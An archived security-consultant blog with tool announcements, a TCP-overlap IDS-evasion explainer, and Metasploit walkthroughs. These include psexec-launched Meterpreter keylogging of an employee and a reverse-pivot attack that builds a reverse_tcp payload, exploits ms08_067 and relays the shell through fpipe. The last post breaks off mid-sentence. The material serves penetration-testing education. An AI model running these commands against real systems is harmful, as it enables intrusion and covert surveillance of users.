Welcome to In Depth Defense. In Depth Defense LLC is a privately owned Information Security Consulting company owned and operated by Mark Baggett. In Depth Defense specializes in Penetration Testing and Incident Response. At this time In Depth Defense is not accepting any new client work, but we are happy to speak to you and point you to other resources in the community.

Mark Baggett has been active in Information Security for 18+ years. I've served in a variety of roles from software developer to CISO. You can find archives of older blog entries below and read my newer posts on http://www.pauldotcom.com, http://isc.sans.edu and http://pen-testing.sans.org

Monday, February 20, 2017

New SEIM API for Phishing Domains

I released a tool to enable network defenders to find phishing and command and control domains. This web API allows your SEIM to identify likely malicious domains. Check out the original posts on the Internet Storm Center.

New Incident Response Tool - SRUM-DUMP

I released an incident response/forensics tool to dump the valuable information stored in Microsoft's System Resource Utilization Monitoring database.   Check it out.

Read the original article posted here on the Internet Storm Center.

Friday, March 18, 2016

Saturday, March 12, 2016

An archive of media links / TV Interviews

On who should learn information security

TV interview after a TEDx Talk

Some footage was also used in this article:

After 40 minutes of super insightful discussion on ways to reduce your exposure to tracking they picked the MOST AWESOME quote.  (Time machine on order)  Note to self:  If you say anything goofy that will be the only thing that airs.

Tweetpaths is cool

Web Cam hacking


Augusta Cyber Security

TEDx at the Chronicle

Invisible Bears.. Yeah.  I said it.   It made sense in context.

Friday, January 8, 2016

Year in Review. 2015 Blogs, Tools, Research & Articles

Continuous Monitoring for Random Strings/DGA with freq_server.py

Detecting Randomly Generated Host Names

Is that a URL or BASE64 encoded string?

The last Security tool you will ever need.  Liam_Neeson.py
Offensive Countermeasures against Linux password theft

Crazy Sexy Hacking

Honey Hashes - Detecting Mimikatz usage:

I am the World's GREATEST Hacker video:

Spot on Podcast.__init__

Python for WMI Queries- Of course you want to do that!

SANS Orlando Brochure Challenge  - A puzzle for SANS Orlando conference

SANS Brochure Challenge write up:

Awesome Keyboard tricks- Sager/Clevo backlight controls in Powershell:

Tuesday, May 12, 2015

Awesome Keyboard Tricks - Clevo/Sager Backlight control from Powershell

I'm back on Windows. After 8 years on a Macintosh I just couldn't go another day with ONLY 16GB of RAM. I priced it out and for the cost of a top of the line MacBook I could get a tricked out PC with 32GB of RAM and 2.5 TB of hard drive space (1.5 of it being SSD). So I made the switch. To get a top performing laptop I ended up buying a gaming machine from xoticpc.com. The model is Sager NP9752 (Clevo P750ZM). I have to say I like it quite a bit. One of the features I was curious about was the "Programmable backlit keyboard". With it you can set your keyboard backlight to various colors and light movement patterns. Now, when I hear "programmable" I think APIs. I was a little disappointed to find out there weren't any documented APIs that I could use to control the keyboard. Your only choice is to use their built in tool to configure the lights on the keyboard. That stinks. I want to be able to change key colors automatically from the command line and from within my own programs. So through a little code analysis and examination of open source Linux versions of drivers I was able to put together the following Powershell script.


Updated link:  https://github.com/MarkBaggett/MarkBaggett/blob/master/set-kbled.ps1

After downloading and storing the script on your local hard drive you import the module into Powershell like this:

C:\PS>import-module .\set-kbled.ps1

Then you can run various options and set your keyboard lights:

C:\PS>SET-KBLED -LeftColor RED -CenterColor WHITE -RightColor Blue

Or turn the lights off


Or turn the lights back on:


Or try some of the various blinking patterns:

C:\PS>SET-KBLED -Pattern Blink

Now I can have my keyboard lights react to specific events in my event log. I can set my laptop so that the keyboard turns BLOOD RED when I launch Metasploit or blinks frantically if a virus is detected. I can have it turn blue when I play some easy listening music. The possibilities are endless. Do you have a Sager or Clevo compatible laptop? Try it. Make sure your Powershell window is running as an administrator, import the module and try some of the commands above. GET-HELP SET-KBLED -Full gives a complete list of options. Hope you enjoy it. Now on to some real work.


Wednesday, December 10, 2014

Security Weekly Posts moved from Pauldotcom.com

You probably are aware that Pauldotcom is now Security Weekly. The guys were kind enough to move all the old posts I did for them to their new website. Here is a list of links to articles by me on the new Security Weekly website.


Saturday, February 23, 2013

2013 Posts and Publications

Here is a collection of blog posts and other things I did or found interesting in 2013.

Violent Python - TJ OConnor
I was the technical editor for Violent Python.

Here are some links to my 2013 Shmoocon presentation.  Unofficial sources report 1200+ people in the room for my presentation with Jake Williams.  

Here is a video: http://www.youtube.com/watch?v=R16DmDMvPeI

I also did a series on the Internet Storm Center on the topic.   Here are some posts.

Part 1 -  http://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
Part 2 -  http://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+2/15406
Part 3 -  http://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+3/15448
Part 4 -  http://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+4/15460

I authored a SANS Course!   SEC573 Python for Penetration Testers.    This is awesome!

File Hiding and Process Obfuscation 
Here is a post I did on Pauldotcom.com on hiding processes.

Python PSEXEC rocks

Manipulate Volume Shadow Copies from Python

SMB Relay Demystified and NTLMv2 Pwnage with Python

TDS, MSSQL and Python

Antivirus Evasion - A peak under the Veil

Windows is 0wned by Default! 
Well. This is pretty scary stuff. Rootkits without rootkits. AV evasion. My latest research project hit some serious pay dirt here. Sitting in Jason Fossen's SEC505 Securing Windows class is always inspiring and educational. Two years ago I was watching him play with the Application Compatibility Toolkit. I commented that it looked a lot like a rootkit. Jason (one of the smartest guys I know) said, "Yep, I think there is probably a lot of things you could do with that." Jason is awesome. I dug into it for a while, shared it with a few friends, then presented it publicly at this year's Derbycon! Check it out.


Wednesday, May 23, 2012

Stuff I worked on in 2011 & 2012

I suppose I should update this site more often... So much to hack; so little time.   Here is some of the public stuff I have been working on in 2011, 2012.

Grabbing Usernames, Passwords, Cookies and more from HTTPS websites

Privilege Escalation through VMWare snapshots

Using Windows Resource Monitor to find hackers

A great SCAPY shortcut for TCP Fuzzing

Python Shells:
One liners:
Put Meterpreter in Python for 100% evasion:

Cool new SQL Injection Tool - It is different!

Volume Shadow Copy, Symbolic Links and directory name craziness
Execute files up to a month after they have been deleted and "cipher /w" wipes them:
Other related stuff:

EAP MD5 Crack - Attack 802.1X

Packet Reassembler for a new IDS ANALYST evasion technique

Convert Iphone Backup to Google Maps & Dump other data

Thursday, January 14, 2010

Some new posts

I've gotten a couple emails asking where I went. For those that do not know I've been posting on Pauldotcom.com. In the future I will post my entries here also, but really... You should follow pauldotcom.com!!!! :) See you there.

Wireless Access Points Defcon 2004 style

GINA Authentication Bypass

Shmoocon tickets. See you there!

All your Active Directory Computer objects - Gone in 60 seconds

Wednesday, November 25, 2009

Authentication Bypass in Gina Replacements.


Wednesday, November 4, 2009

Layer 1 Port knocking

Maybe not, but it's pretty cool!

Sunday, August 16, 2009

TCP Fragment Evasion

Originally posted on http://pauldotcom.com/2009/08/tcp-frament-evasion-attacks.html

By: Mark Baggett

I recently read a very good article on tuning Snort's Stream5 preprocessor to avoid "TCP Fragment Overlap" attacks. It's a great article, but the wording confused me. I thought to myself, "TCP Fragments, that must be a mistake. The TCP Header doesn't have a 'more fragments bit', a 'fragment offset' or anything to support fragmentation. How can there be any TCP fragments?"   Typically when we talk about fragmentation attacks we think about Layer 3 attacks. Attackers manipulate the IP packet headers to pull off various insertion and evasion attacks. Examples of layer3 attacks include overlapping fragment attacks and temporal evasion (host reassembly timeout evasion). These attacks are explained pretty well in an article titled "Evading NIDS, revisited".

So what is TCP or Layer 4 "fragmentation"? Really, it's overlapping or retransmitted datagrams with the same TCP sequence number. To demonstrate the concept I fired up a virtual machine running Backtrack 3. I ran a netcat listener on my host (nc -l -p 9000) and used a netcat client in Backtrack to connect to it. I fired up Wireshark to watch the packets and I transferred the text "This is a test of the emergency broadcast system. If it were an actual emergency" between the two hosts. This is what Wireshark captured.

Figure #1 (image not reproduced)

Perfect. Exactly what we would expect. Since my packet doesn't exceed the MTU of the established TCP connection, a single packet is transferred to the client with a single acknowledgment in return. If it had exceeded the MTU it still wouldn't have fragmented. It would have sent more than one datagram, each with its own unique IP ID.

Then I created a fragroute configuration file with one line in it:

tcp_seg 16

This will cause fragroute to break the packets down so that they can only carry 16 bytes of TCP traffic. I start fragroute (fragroute -f ~/myfrag.conf) and transfer the same text between the hosts...

Figure #2 (image not reproduced)

Fragroute works as expected and breaks the packets down such that only 16 bytes of data can be transferred in each packet. Each packet's sequence number increases by the number of bytes transmitted. Sequence numbers increase in order. Also, notice that each packet has its own unique IP ID field. There is NO FRAGMENTATION. The "More Fragments bit" isn't set. The fragment offset isn't set. No fragments. Instead, fragroute is transferring packets as if the MTU of the segment is only enough for 16 TCP bytes.

So now lets do some "tcp fragmentation overlaps". I change my fragroute.conf file to say this:

tcp_seg 16 new

This will cause fragroute to transmit frames with overlapping sequence numbers.   This attack takes advantage of the fact that the TCP layer doesn't pass data up the stack to the application until it has acknowledged the data and that packets are acknowledged in sequential order.    So if we skip datagram #3  and transmit datagrams #4, #5 and #6, duplicates of #4 and overlaps of #5 and #6 then the TCP stack needs to hold datagrams #4,#5 and #6 (as long as they are within the window size) and figure out what to do with duplicates/overlaps once it receives fragment #3.

To see this in action I fire up fragroute and retransmit the text "This is a test of the emergency broadcast system. If it were an actual emergency"  

Figure #3 (image not reproduced)

Let's look at the fragroute packets in figure #3. The first two datagrams (#1 and #2) are garbage. Their payload is random junk. Then fragroute transmits good data in packets 4 and 5. The payload here is the end of our payload "If this had been an actual emergency." After the 4th packet the receiving host begins screaming to the transmitting client "HEY DUDE, ACK 2933750986. I didn't get that one yet". The receiving TCP stack is complaining about not receiving the first datagram. Then fragroute sends 2 packets with 32 TCP bytes in each. These two datagrams include the FIRST datagram (notice packet #10 has the lowest sequence number and the embedded text payload). Parts of these two packets overlap packets 1 and 2. Packet #9 overlaps 16 bytes of packet #2. 16 bytes of packet #10 overlap packet #1. If the TCP reassembly engine favors NEW packets then it will reassemble the text as expected. If the IDS reassembles the packets favoring the OLD packets then we can bypass the IPS. If we were drawing analogies to layer three fragment attacks, holding the low sequence number datagrams is equivalent to setting the "more fragments bit" and the sequence number is the equivalent of the fragment offset. So how to fix this? The attacks aren't new. Snort has the STREAM5 preprocessor. Just be sure that you tune STREAM5 just like your FRAG3 preprocessor.
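To make the reassembly-policy point concrete, here is an added Python example (not code from the original post, and not fragroute or Snort code). It models a TCP receiver rebuilding the byte stream under two overlap policies: "first" (the data first seen for a byte offset is kept, i.e. favor OLD segments) and "last" (a later segment for the same offset overwrites, i.e. favor NEW segments). The segment list CAPTURE is constructed to loosely resemble figure #3: two 16-byte segments of junk arrive first, then real data further along, then a 32-byte retransmission of the first 32 bytes carrying the real text. The initial sequence number of 0 is an assumption for readability; real stacks randomize it. The conflicting_overlap_bytes function is the defender's angle: a retransmission whose bytes differ from what was already sent is not normal TCP behaviour, and a sensor can count and alert on it regardless of which policy it reassembles with.

```python
# Added example: TCP segment reassembly under different overlap policies.
# Not code from the original post; CAPTURE is constructed to resemble the
# fragroute "tcp_seg 16 new" behaviour described above.

MSG = b"This is a test of the emergency broadcast system. If it were an actual emergency"
ISN = 0  # assumed initial sequence number; real stacks pick a random one


def junk_for(span):
    """Deterministic garbage that differs from the real payload at every byte."""
    return bytes(b ^ 0xFF for b in span)


# Constructed capture in arrival order: (sequence number, payload bytes).
CAPTURE = [
    (ISN + 0,  junk_for(MSG[0:16])),   # "old" segment 1: random junk
    (ISN + 16, junk_for(MSG[16:32])),  # "old" segment 2: random junk
    (ISN + 48, MSG[48:64]),            # real data beyond the hole
    (ISN + 64, MSG[64:]),              # real data
    (ISN + 0,  MSG[0:32]),             # "new" 32-byte segment: real text overlapping segments 1 and 2
    (ISN + 32, MSG[32:48]),            # the withheld chunk that finally fills the hole
]


def reassemble(segments, policy, isn=ISN):
    """Rebuild the in-order stream as a receiver with the given overlap policy would.

    policy="first": keep the first data seen for an offset (favor OLD data).
    policy="last":  later data for the same offset overwrites (favor NEW data).
    Only the contiguous run from the first byte is delivered, as TCP does.
    """
    if policy not in ("first", "last"):
        raise ValueError("policy must be 'first' or 'last'")
    stream = {}
    for seq, data in segments:
        for i, byte in enumerate(data):
            offset = ((seq - isn) & 0xFFFFFFFF) + i  # 32-bit sequence arithmetic
            if policy == "first" and offset in stream:
                continue
            stream[offset] = byte
    out = bytearray()
    while len(out) in stream:
        out.append(stream[len(out)])
    return bytes(out)


def conflicting_overlap_bytes(segments, isn=ISN):
    """Count byte offsets covered more than once with DIFFERENT data.

    A genuine retransmission repeats the same bytes; differing bytes mean a sender
    (or a middlebox like fragroute) is playing reassembly games, which is worth an alert.
    """
    seen = {}
    conflicts = 0
    for seq, data in segments:
        for i, byte in enumerate(data):
            offset = ((seq - isn) & 0xFFFFFFFF) + i
            if offset in seen and seen[offset] != byte:
                conflicts += 1
            seen[offset] = byte
    return conflicts


def policies_disagree(segments, isn=ISN):
    """True when a sensor favoring old data sees a different stream than a host favoring new data."""
    return reassemble(segments, "first", isn) != reassemble(segments, "last", isn)


if __name__ == "__main__":
    print("favor new :", reassemble(CAPTURE, "last"))
    print("favor old :", reassemble(CAPTURE, "first"))
    print("conflicting overlap bytes:", conflicting_overlap_bytes(CAPTURE))
    print("sensor and host could disagree:", policies_disagree(CAPTURE))
```

Run as-is, the "last" policy yields the real text while the "first" policy delivers 32 bytes of junk followed by the rest of the message, which is exactly the gap an IDS tuned to the wrong policy falls into. The practical takeaway is the one the post makes: the sensor's stream reassembly policy has to match the monitored host's, and conflicting overlaps are themselves a signal worth logging.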


Snort's Stream5 and TCP overlapping fragments - an article by Richard Bejtlich that sparked my interest in this topic. It's a very good article with more explanation on tuning the Snort preprocessor.

Sunday, June 28, 2009

Posts moving to PaulDotCom

I'm joining the guys at Pauldotcom. They have invited me to post my blog entries on their site. As posts go up on their site I'll provide a link to them here and I'll post some less technical notes here. I'm pretty excited about the opportunity to work with those guys and looking forward to it.

Friday, May 22, 2009

Don't forget to wipe!

A while back I assisted the FBI in the collection of evidence on a now convicted sexual offender. The guy had a hard drive full of child porn. My customer had suspicions that an employee in a remote office was accessing inappropriate material on their work computer and asked that I investigate it remotely. After finding one photo of a very young girl among a collection of "normal" porn and discussing it with my customer, I immediately dialed my contact with the FBI. (Good contacts are ESSENTIAL; don't wait until you need them to try and make them.) Although the young girl was clothed in the picture I saw, the lingerie and pose she was in were very disturbing and you just knew you didn't want to see anything else. At that point I froze; anything else that was touched remotely was altering and potentially destroying evidence on the remote drive. Within an hour the FBI was at the office. He used my machine and the access I had gained to briefly verify the contents of the drive and confirm that it required additional investigation. It did and they dispatched local agents to grab the drive for proper forensic collection.

I spared myself the imagery and let the FBI do what it needed to do using my machine. To me, this story is very interesting. Here is a person in a very similar role to the one I played. He could be prosecuted for any residual images left behind on his drive after an investigation.


As far as I know, no CP was ever copied to my hard drive. I had donated a thumbdrive to the cause where all the evidence they needed during that brief investigation was collected. If it is a project I am working on with sensitive data (such as a penetration test) I like to keep everything in a TrueCrypt volume, making clean up very easy. But in this case, I wasn't driving. It was a Windows box and I periodically run "CIPHER /W:C:\" to clean up all the residual files in the free space on the drive, but it's not something I do religiously. How about you? Well, Cipher is running NOW!

Tuesday, April 28, 2009

Good enough Compliance??

Check out this article..


What is "Good enough Compliance?" You either ARE compliant or you ARE NOT. It's a switch. The article should be a guide to "Good enough security". Good security is not the same as being compliant. I would much rather have good security than be compliant with any given regulation. But good security often covers many of the security requirements outlined in compliance standards. Two things came to mind reading the article.

1) Don't trust Sony Pictures with any personal data or credit card information.
2) How many data breaches are REALLY happening?

What does this paragraph suggest?
"According to Behnam Dayanim, a privacy attorney with Paul, Hastings, Janofsky & Walker, state security breach notification laws are among the most frequently ignored types of security regulation. About 35 states have passed security breach notification laws, which lay out, to varying degrees, when an enterprise needs to notify customers and clients if their private information may have been exposed to an unauthorized user. According to CIO and PricewaterhouseCoopers’ “The Global State of Information Security 2006” survey, 32 percent of U.S. organizations admit to not being compliant with state privacy regulations."

According to this paragraph 32% of organizations admit to not being compliant with state privacy laws. The only way to be non-compliant with those laws is to have a breach and not disclose it properly right? That is a significant number of unreported breaches.

Well, at least Myspace did the right thing this past April. Check out their disclosure on April 16th, 2009.

Thursday, April 23, 2009

Interesting story on US Cyber attack

"Just after midnight on Thursday, April 9, unidentified attackers climbed down four manholes serving the Northern California city of Morgan Hill and cut eight fiber cables in what appears to have been an organized attack on the electronic infrastructure of an American city. Its implications, though startling, have gone almost un-reported."


Wednesday, April 15, 2009

Snort 3.0 SANS Paper

Here is a great SANS GCIA Gold paper for anyone interested in Snort 3.0. Doug also created a very nice bootable live cd with Snort 3.0, Sguil, and other tools from the 503 track. Check him out at http://securityonion.blogspot.com.


Monday, March 23, 2009

No exploit Metasploit usage - VNC and Keylogging

OK. I admit it. I use Metasploit at work. Of course, I have permission to use it as a penetration testing tool, but I find it to be very useful in other circumstances as well. I often use the PSEXEC "exploit" to provide a username and password to fully patched machines for administrative purposes. For example, it has come in handy when the standard remote access tools have been removed and there is a remote machine that the support center is unable to access. They, rightly so, have figured out that if the security team can get in to their machines without usernames and passwords, it should be pretty easy for them to help recover a managed machine with known usernames and passwords. One option to troubleshoot the broken admin software is to remotely (and temporarily) install VNC on the stranded host. I used to connect to the remote c$ with administrator credentials, copy up VNC, import the required registry keys, start the server, fix the problem, clean up the registry, clean up the files and kill the service. Now I just do this..

./msfcli windows/smb/psexec smbuser=myadminacct smbpass=mypassword smbdomain=companydomain rhost=strandedmachineip payload=windows/vncinject/bind_tcp E

There is no clean up because the tool never reaches the disk of the remote machine. This is very nice. Doug Burks and I have even talked about stripping down ./msfweb to a barebones version that just asks for IP, username and password and launches the VNC session. ./msfwebvnc could be wrapped around a msfd instance on a central server that allows the support center to recover machines. We may do that some day. Comment if that interests you. Now meterpreter has introduced another feature I suspect I will use at work.

I occasionally get asked to run a keylogger on an employee's machine. Meterpreter now has this functionality built into it. Before you do this, talk with HR and your legal team. In my opinion no employee investigations should ever occur without HR's involvement. Maybe it's because wiretap laws make me nervous about using my KeyGhost logger, but anytime I'm dealing with keyloggers I like to talk with our lawyers. I've been told it's not a problem many times before, but I check with them first. Meterpreter on the other hand is software and there is no "wire tapping" going on. It should be much less intrusive and you're less likely to have the employee notice it. Ask me to tell you the horror story about the USB keylogger and the KVM system some time. Also, I can use meterpreter to keylog a remote office in only a few seconds. So now a keylogger on a remote system is as easy as:

./msfcli windows/smb/psexec smbuser=myadminacct smbpass=mypassword smbdomain=companydomain rhost=monitoredmachineip payload=windows/meterpreter/bind_tcp E
[*] Please wait while we load the module tree...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened ( ->

meterpreter > grabdesktop

Trying to hijack the input desktop...

meterpreter > keyscan_start

Starting the keystroke sniffer...

meterpreter > keyscan_dump

Dumping captured keystrokes...

 I'm so glad we use this encrypted im channel to exchange sensitive data so the company doesn't catch us.   The stolen data is...

meterpreter >keyscan_stop

Interestingly, the keylogger does not capture the usernames and passwords when the user enters them at the screen saver logon prompts.   It records ctrl-alt-delete but not the password.   This is actually a good thing from my intended use.   Not knowing employees passwords protects the integrity of our audit logs.   

Sunday, March 22, 2009

Metasploit adds new keylogger and Mac payloads

Metasploit added some pretty interesting payloads to its arsenal this week. First, Meterpreter (the only payload you'll ever need) added a keylogger. Plus, they have added some cool payloads for the Mac. There is a set of iSight payloads that will snap a picture from the iSight camera (bind_tcp, reverse_tcp, etc). This payload is a part of the "bundle inject" payload, which is documented in the Mac OS X hackers handbook; this looks like it could be the beginning of a meterpreter-like pluggable payload for OS X. Charles Miller, winner of the new Macintosh Powerbooks at both the 2008 and 2009 Pwn2Own contests, is coauthor of the payloads along with Dino Dai Zovi. That is definitely a book I will be adding to my library. Here is a recent presentation with some interesting information on the payloads.

Saturday, March 21, 2009

SANS 504 - Hacking Techniques, Exploits and Incident Response Augusta, GA

I'm going to mentor another SANS 504 session this fall. Hacking Techniques, Exploits and Incident Response is one of my favorite SANS classes. This is my third mentor session and my second time running 504. Last year SANS gave me the Mentor of the Year award so they are giving me some additional flexibility in the mentor format. This time we are running a modified mentor format. We will have 13 more hours of class time than the normal mentor session. That's more time for covering the materials and doing exercises. If you're interested get full details and sign up here. Greater Augusta ISSA members contact me for a very special discount code.

Sunday, February 15, 2009

Using the free AlienVault.com Nessus feed on your Mac

Tenable has changed their license and you can no longer use their vulnerability feeds for commercial use. Alienvault.com has a free Nessus feed you can subscribe to. It is available for use here. You will notice two update programs there. One for Unix and one for Windows. What about the Mac? To subscribe to the Nessus feeds on your Macintosh do this:

1) Download the linux update script.
2) Update it so it works on your MAC as described below.

First, in the "#Plugin dir" section you will need to change the line that reads:


3) chmod +x alienvault-feed-sync.sh

If you run the script by typing :

./alienvault-feed-sync.sh  nessus 

you will see an error about not being able to find the command "md5sum". The Nessus feed update did work, but the script was unable to compare the hashes to verify it completed successfully. That might be good enough for you and you can go about using your updated feeds. BUT, I want to see that those hashes match. Really, it is not buying me much security because I'm downloading the "md5sum" file that I am using for comparison from the same location as the files, but it's still a good integrity check. To fix it, you might waste your time as I did and change "findcmd md5sum" in the update script to "findcmd md5" since md5 is the name of the md5sum utility on OS X. But if you do you will get the following error:

"Error: md5sums not correct. Your NVT collection might be broken now."

Why? The default version of md5 that comes with the OS doesn't support the --check (-c) option. For the file check to work you will want to install the version of md5 that is installed on most Linux distributions. It is called md5sum and it is available for install through fink.
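The check the update script is trying to do (compare each downloaded file against the md5sum manifest that ships with the feed) is easy to perform portably without depending on md5sum -c or on the OS X md5 binary. The script below is an added example and is not part of the AlienVault update script: it parses an md5sum-format manifest, hashes each listed file, and reports ok, mismatch or missing per entry, the same three outcomes md5sum -c distinguishes. The file names and contents inside demo() are constructed for the demonstration. As the post notes, a manifest fetched from the same server as the files proves only that the download was not corrupted, not that the feed is authentic; that needs a signature or a hash obtained over a separate trusted channel.

```python
# Added example (not the AlienVault update script): portable verification of an
# md5sum-format manifest, equivalent to what `md5sum -c` does on Linux.
import hashlib
import os
import tempfile


def md5_of_file(path, chunk=1 << 16):
    """Stream the file through MD5 so large plugin archives need not fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text):
    """Parse md5sum(1) output lines: '<32 hex digits>  <name>' (or ' *<name>' in binary mode).

    Returns a list of (name, lowercase hex digest). Absolute names and names with a
    '..' component are rejected so a hostile manifest cannot point outside base_dir.
    """
    hexdigits = set("0123456789abcdefABCDEF")
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 32 or not set(parts[0]) <= hexdigits:
            raise ValueError(f"line {lineno}: not in md5sum format: {line!r}")
        name = parts[1].lstrip("*")
        if os.path.isabs(name) or ".." in name.replace("\\", "/").split("/"):
            raise ValueError(f"line {lineno}: unsafe file name in manifest: {name!r}")
        entries.append((name, parts[0].lower()))
    return entries


def verify_manifest(text, base_dir):
    """Return {name: 'ok' | 'mismatch' | 'missing'} for every entry in the manifest."""
    results = {}
    for name, expected in parse_manifest(text):
        path = os.path.join(base_dir, name)
        if not os.path.isfile(path):
            results[name] = "missing"
        elif md5_of_file(path) == expected:
            results[name] = "ok"
        else:
            results[name] = "mismatch"
    return results


def demo():
    """Constructed scenario: two plugin files plus a manifest; one file is altered afterwards."""
    with tempfile.TemporaryDirectory() as d:
        files = {"feed-a.nasl": b"# constructed plugin A\n",
                 "feed-b.nasl": b"# constructed plugin B\n"}
        for name, body in files.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(body)
        manifest = "".join(f"{md5_of_file(os.path.join(d, n))}  {n}\n" for n in files)
        manifest += "0" * 32 + "  missing.nasl\n"  # listed in the manifest but never downloaded
        with open(os.path.join(d, "feed-b.nasl"), "ab") as f:
            f.write(b"altered after the manifest was produced\n")
        return verify_manifest(manifest, d)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:9} {name}")
```

Point verify_manifest at the downloaded plugin directory and the manifest's text to get the per-file result the update script wanted to show; any mismatch or missing entry means the feed should be discarded and re-fetched rather than loaded.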

Happy bug hunting.

Wednesday, February 4, 2009

Reverse Pivots with Metasploit - How NOT to make the lightbulb

In a penetration test your target is PII kept on a corporate file server which I will call Victim2. You are outside the firewall but have gained access to an internal host, Victim1, when a user opened your Word document with an embedded Meterpreter payload. The stager embedded in the Word document made a REVERSE_TCP connection to your machine which uploaded metsrv.dll to the victim. The machine you have access to (Victim1) has unfiltered access to your target (Victim2). Victim2 is vulnerable to ms08_067_netapi. Victim2 however, has NO access to the internet at all. Were it not for the strict egress firewall rules controlling Victim2 you could have used the ROUTE command to pivot your attack through your meterpreter session on Victim1 to Victim2, and have Victim2 send you a shell directly like this...

Your IP =
Victim1 =
Victim2 =

Background session 1? [y/N] y
msf exploit(ms08_067_netapi) > route add 1
msf exploit(ms08_067_netapi) > route print

Active Routing Table

Subnet Netmask Gateway
------ ------- ------- Session 1

msf exploit(ms08_067_netapi) > sessions -l

Active sessions

Id Description Tunnel
-- ----------- ------
1 Meterpreter ->

msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > set LHOST
msf exploit(ms08_067_netapi) > exploit

And the session would be shoveled back to you from Victim2. BUT, this time, strong egress filters prevailed and you can't make that direct connection. So you decide to relay it back through Victim1, which does have access to the internet. How do you do that?

Here was my first thought. I'll use meterpreter's PORTFWD command on VICTIM1 to set up a TCP relay back to me. Then I'll exploit Victim2 and set my LHOST to Victim1 ( and my LPORT to the PORTFWD listener on Victim1. My attack will flow through my pivot and return to me via the PORTFWD on Victim1.

Guess what. You can't do that. LHOST and LPORT have to be a valid IP address on your host or the exploit won't even launch. Metasploit won't let your LHOST be Victim1. Maybe I could do some CHOST,CPORT trickery (see the advanced options)? I couldn't make that work either.

OK so I can't launch an exploit. But I can make one!
./msfpayload windows/meterpreter/reverse_tcp LHOST=victim1 LPORT=portfwd listener X > custompayload.exe

Then I can use the Upload and Execute payloads to exploit victim2 and get my shell!!
Nope. That doesn't work either. Why? I think there is a bug in PORTFWD.

When you run portfwd and don't provide the OPTIONAL -L ip address it appears to work. You get something like this..

meterpreter > portfwd add -l 6666 -r -p 80
[*] Local TCP relay created: <->

But nothing is listening on port 6666. A quick "execute -c -f cmd.exe; interact 1; netstat -na" shows nothing listening on the port. An NMAP of the host confirms no listener...

Macintosh:~ mark.baggett$ nmap -p 6666

Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-03 22:47 EST
Interesting ports on
6666/tcp closed irc

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Macintosh:~ mark.baggett$

If I try to force the matter with a -L I get a nasty "Can't assign requested address" message.

meterpreter > portfwd add -L -l 6666 -r -p 80
[-] Error running command portfwd: Can't assign requested address - bind(2) /Applications/framework3/lib/rex/socket/comm/local.rb:138:in `bind'/Applications/framework3/lib/rex/socket/comm/local.rb:138:in `create_by_type'/Applications/framework3/lib/rex/socket/comm/local.rb:26:in `create'/Applications/framework3/lib/rex/socket.rb:45:in `create_param'/Applications/framework3/lib/rex/socket.rb:52:in `create_tcp'/Applications/framework3/lib/rex/socket.rb:59:in `create_tcp_server'/Applications/framework3/lib/rex/services/local_relay.rb:184:in `start_tcp_relay'/Applications/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb:219:in `cmd_portfwd'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'/Applications/framework3/lib/rex/ui/text/shell.rb:123:in `call'/Applications/framework3/lib/rex/ui/text/shell.rb:123:in `run'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'/Applications/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'/Applications/framework3/lib/rex/ui/interactive.rb:48:in `interact'/Applications/framework3/lib/msf/ui/console/command_dispatcher/core.rb:918:in `cmd_sessions'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in 
`each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/rex/ui/text/shell.rb:127:in `run'./msfconsole:82
meterpreter > ipconfig

Parallels OEM Adapter.
Hardware MAC: 00:1c:42:99:40:22
IP Address :
Netmask :

OK. So maybe there is a bug in portfwd. I punt and I use a different external TCP relay program. I upload and execute FPIPE.EXE and use it on Victim1 to relay the session from Victim2 back to My IP.

fpipe.exe -i -l 5555 -r 80

[*] Handler binding to LHOST
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

And that's it! It's all good with one VERY IMPORTANT exception. I never get
